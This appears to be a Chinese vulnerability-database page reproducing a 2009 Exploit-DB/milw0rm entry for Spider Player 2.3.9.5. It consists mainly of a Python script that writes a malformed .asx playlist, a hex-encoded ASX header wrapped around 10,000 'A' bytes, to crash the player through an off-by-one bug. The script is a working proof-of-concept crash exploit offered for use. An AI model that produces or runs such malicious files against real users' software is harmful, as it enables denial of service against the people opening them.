Spider Player 2.3.9.5 - '.asx' Off-by-One Crash

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057390 漏洞类型
发布时间 2009-01-30 更新时间 2009-01-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7934
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#exploit.py
#Spider Player 2.3.9.5 Crash Exploit
#others files can be used for crash  m3u , pls .... 

print " Spider Player 2.3.9.5 off by one Crash Exploit ( asx file ) \n"

         	
header1 = (
			"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
		        "\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
			"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
			"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
			"\x3D\x22"
			)

header2 = (
			"\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
			"\x3E\x3C\x2F\x41\x53\x58\x3E"
		   )
			
crash = "\x41" * 10000

exploit = header1 + crash  + header2

try:
    out_file = open("crash.asx",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-01-30]